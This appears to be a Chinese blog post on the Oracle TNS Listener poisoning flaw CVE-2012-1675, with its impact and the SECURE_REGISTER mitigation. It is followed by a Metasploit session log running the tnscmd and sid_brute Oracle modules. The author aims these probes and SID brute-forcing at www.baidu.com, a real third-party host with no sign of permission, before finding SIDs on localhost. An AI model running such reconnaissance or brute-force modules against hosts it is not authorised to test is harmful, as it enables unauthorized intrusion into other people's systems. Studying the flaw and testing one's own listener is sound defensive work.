Oracle TNS Listener Remote Poisoning 测试

1. 远程数据投毒漏洞（CVE-2012-1675）
   允许***者在不提供用户名/密码的情况下，向远程“TNS Listener”组件处理的数据投毒的漏洞。
   COST 是class of secure transports 的缩写。是为了控制实例注册提供的一种安全控制机制。其作用是对于一个确定的listener，限制哪些实例通过哪些协议可以进行注册。这将避免有其他远程实例进行恶意注册，并由此产生信息泄露等风险。
   它通过在 listner.ora中设置参数SECURE_REGISTER_listener_name的值，指定为一个transport list（限定的注册协议列表，如IPC、tcp、TCPS）来实现这一功能。 该功能从 10.2.0.3 版本开始支持（虽然10g R2的在线文档中并未明确说明），一直到11.2.0.4版本及之后依然可用。但是，在11.2.0.4后，oracle建议使用默认的VNCR配置。

2. 危害
   最主要的危害为，***者可以自行创建一个和当前生产数据库同名的数据库，将其向生产数据库的监听注册。
   这样将导致用户连接被路由指向***者创建的实例，造成业务响应中断
   应用程序报告 ORA-12545: Connect failed because target host or object does not exist
3. 受到影响的版本
   虽然安全警告描述的是10203开始，但是实际是从8i开始的任何版本
   4.我的验证

[root@204_maridb ~]# curl https://raw.GitHubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \

chmod 755 msfinstall && \
./msfinstall
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5532 100 5532 0 0 6758 0 --:--:-- --:--:-- --:--:-- 6754
Checking for and installing update..
Adding metasploit-framework to your repository list..已加载插件：fastestmirror
Repository base is listed more than once in the configuration
Repository updates is listed more than once in the configuration
Repository extras is listed more than once in the configuration
Repository Centosplus is listed more than once in the configuration
metasploit | 2.9 kB 00:00:00
metasploit/primary_db | 9.8 kB 00:00:00
Loading mirror speeds from cached hostfile

• epel: mirrors.tuna.tsinghua.edu.cn
  正在解决依赖关系
  --> 正在检查事务
  ---> 软件包 metasploit-framework.x86_64.0.5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6 将被 安装
  --> 解决依赖关系完成

依赖关系解决

========================================================================================================================================================================================================
Package 架构 版本 源 大小

正在安装:
metasploit-framework x86_64 5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6 metasploit 195 M

事务概要

安装 1 软件包

总下载量：195 M
安装大小：433 M
Downloading packages:
警告：/var/cache/yum/x86_64/7/metasploit/packages/metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64.rpm: 头V4 RSA/SHA256 Signature, 密钥 ID 2007b954: NOKEYMB 00:00:00 ETA
metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64.rpm 的公钥尚未安装
metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64.rpm | 195 MB 00:05:07
从 file:///etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit 检索密钥
导入 GPG key 0x2007B954:
用户ID : "Metasploit <metasploit@rapid7.com>"
指纹 : 09e5 5faf 4f78 62cd 6d55 8997 cdfb 5fa5 2007 b954
来自 : /etc/pki/rpm-gpg/RPM-GPG-KEY-Metasploit
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
正在安装 : metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64 1/1
Run msfconsole to get started
验证中 : metasploit-framework-5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6.x86_64 1/1

已安装:
metasploit-framework.x86_64 0:5.0.19+20190423132450.git.7.b9e2e14~1rapid7-1.el6

完毕！
[root@204_maridb ~]# ms
msfbinscan msfd msfelfscan msfpescan msfrpc msfupdate msgattrib msGCmp msgconv msgexec msgfmt msghack msgmerge msguniq
msfconsole msfdb msfMachscan msfrop msfrpcd msfvenom msgcat msgcomm msgen msgfilter msggrep msginit msgunfmt msql2Mysql
[root@204_maridb ~]# msfconsole
-bash: /usr/local/bin/msfconsole: 没有那个文件或目录
[root@204_maridb ~]# which msfconsole
/usr/bin/msfconsole
[root@204_maridb ~]# /usr/bin/msfconsole
[-] *rting the Metasploit Framework console...|
[-] WARNING: No database support: No database YAML file
[-]

+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __ | |
| ==c(__(o(__(() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \ | |_______ |
| // \ | |==[msf >]============\ |
| // \ | |__\ |
| // RECON \ | (@)(@)(@)(@)(@)(@)(@)/ |
| // \ | ***** |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l | / || \ |
| | PAYLOAD |""_, | / (|| \ |
| |__||)| | | _||) | |
| |(@)(@)"""|(@)(@)|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+

   =[ metasploit v5.0.19-dev-                         ]

• -- --=[ 1880 exploits - 1062 auxiliary - 328 post ]
• -- --=[ 546 payloads - 44 encoders - 10 nops ]
• -- --=[ 2 evasion ]

msf5 > use auxiliary/admin/oracle/tnscmd
msf5 auxiliary(admin/oracle/tnscmd) > info

   Name: Oracle TNS Listener Command Issuer
 Module: auxiliary/admin/oracle/tnscmd
License: Metasploit Framework License (BSD)
   Rank: NORMal

Disclosed: 2009-02-01

Provided by:
MC <mc@metasploit.com>

Check supported:
No

Basic options:
Name Current Setting Required Description

CMD (CONNECT_DATA=(COMMAND=VERSION)) no Something like ping, version, status, etc..
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port (TCP)

Description:
This module allows for the sending of arbitrary TNS commands in
order to gather information. Inspired from tnscmd.pl from
www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd

msf5 auxiliary(admin/oracle/tnscmd) > set RHOST www.xxxx.cc
RHOST => www.xxxx.cc
msf5 auxiliary(admin/oracle/tnscmd) > show options

Module options (auxiliary/admin/oracle/tnscmd):

Name Current Setting Required Description

CMD (CONNECT_DATA=(COMMAND=VERSION)) no Something like ping, version, status, etc..
RHOSTS www.xxxx.cc yes The target address range or CIDR identifier
RPORT 1521 yes The target port (TCP)

msf5 auxiliary(admin/oracle/tnscmd) > run
[-] Auxiliary failed: option RHOSTS failed to validate.
msf5 auxiliary(admin/oracle/tnscmd) > set RHOST www.baidu.com
RHOST => www.baidu.com
msf5 auxiliary(admin/oracle/tnscmd) > show options

Module options (auxiliary/admin/oracle/tnscmd):

Name Current Setting Required Description

CMD (CONNECT_DATA=(COMMAND=VERSION)) no Something like ping, version, status, etc..
RHOSTS www.baidu.com yes The target address range or CIDR identifier
RPORT 1521 yes The target port (TCP)

msf5 auxiliary(admin/oracle/tnscmd) > run
[*] Running module against 61.135.169.125

[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).
[] Running module against 61.135.169.121
[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).
[] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/tnscmd) > use auxiliary/admin/oracle/sid_brute
msf5 auxiliary(admin/oracle/sid_brute) > show options

Module options (auxiliary/admin/oracle/sid_brute):

Name Current Setting Required Description

RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port (TCP)
SIDFILE /opt/metasploit-framework/embedded/framework/data/Wordlists/sid.txt no The file that contains a list of sids.
SLEEP 1 no Sleep() amount between each request.

msf5 auxiliary(admin/oracle/sid_brute) > set RHOST www.baidu.com
RHOST => www.baidu.com
msf5 auxiliary(admin/oracle/sid_brute) > show options

Module options (auxiliary/admin/oracle/sid_brute):

Name Current Setting Required Description

RHOSTS www.baidu.com yes The target address range or CIDR identifier
RPORT 1521 yes The target port (TCP)
SIDFILE /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt no The file that contains a list of sids.
SLEEP 1 no Sleep() amount between each request.

msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 61.135.169.121

[] www.baidu.com:1521 - Starting brute force on www.baidu.com, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).
[] Running module against 61.135.169.125
[] www.baidu.com:1521 - Starting brute force on www.baidu.com, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[-] www.baidu.com:1521 - The connection timed out (www.baidu.com:1521).
[] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1

[] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'PLSExtProc'
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[] 127.0.0.1:1521 - Done with brute force...
[] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > run
[] Running module against 127.0.0.1

[] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'PLSExtProc'
[-] 127.0.0.1:1521 - The connection was refused by the remote host (127.0.0.1:1521).
[] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1

[*] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'PLSExtProc'

[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[] 127.0.0.1:1521 - Done with brute force...
[] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) >
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1

[] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[] 127.0.0.1:1521 - Done with brute force...
[] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > run
[] Running module against 127.0.0.1

[] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[] 127.0.0.1:1521 - Done with brute force...
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) > exit
[root@204_maridb ~]# /usr/bin/msfconsole
[-] *rting the Metasploit Framework console...|
[-] WARNING: No database support: No database YAML file
[-]

           .;lxO0KXXXK0Oxl:.
       ,o0WMMMMMMMMMMMMMMMMMMKd,
    'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
  :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
.KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,

lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo
xMMMMMMMMMMWd. .oNMMMMMMMMMMk
oMMMMMMMMMMx. dMMMMMMMMMMx
.WMMMMMMMMM: :MMMMMMMMMM,
xMMMMMMMMMo lMMMMMMMMMO
NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW. ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd ,0MMMMMMMMMMK;
.WMMMMMMMMMc 'OMMMMMM0,
lMMMMMMMMMMk. .kMMO'
dMMMMMMMMMMWd' ..
cWMMMMMMMMMMMNxc'. ##########
.0MMMMMMMMMMMMMMMMWc #+# #+#
;0MMMMMMMMMMMMMMMo. +:+
.dNMMMMMMMMMMMMo +#++:++#+
'oOWMMMMMMMMo +:+
.,cdkO0K; :+: :+:
:::::::+:
Metasploit

   =[ metasploit v5.0.19-dev-                         ]

• -- --=[ 1880 exploits - 1062 auxiliary - 328 post ]
• -- --=[ 546 payloads - 44 encoders - 10 nops ]
• -- --=[ 2 evasion ]

msf5 > use auxiliary/admin/oracle/tnscmd
msf5 auxiliary(admin/oracle/tnscmd) > show options

Module options (auxiliary/admin/oracle/tnscmd):

Name Current Setting Required Description

CMD (CONNECT_DATA=(COMMAND=VERSION)) no Something like ping, version, status, etc..
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port (TCP)

msf5 auxiliary(admin/oracle/tnscmd) > use auxiliary/admin/oracle/sid_brute
msf5 auxiliary(admin/oracle/sid_brute) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf5 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against 127.0.0.1

[] 127.0.0.1:1521 - Starting brute force on 127.0.0.1, using sids from /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt...
[+] 127.0.0.1:1521 - 127.0.0.1:1521 Found SID 'TSH1'
[] 127.0.0.1:1521 - Done with brute force...
[*] Auxiliary module execution completed
msf5 auxiliary(admin/oracle/sid_brute) >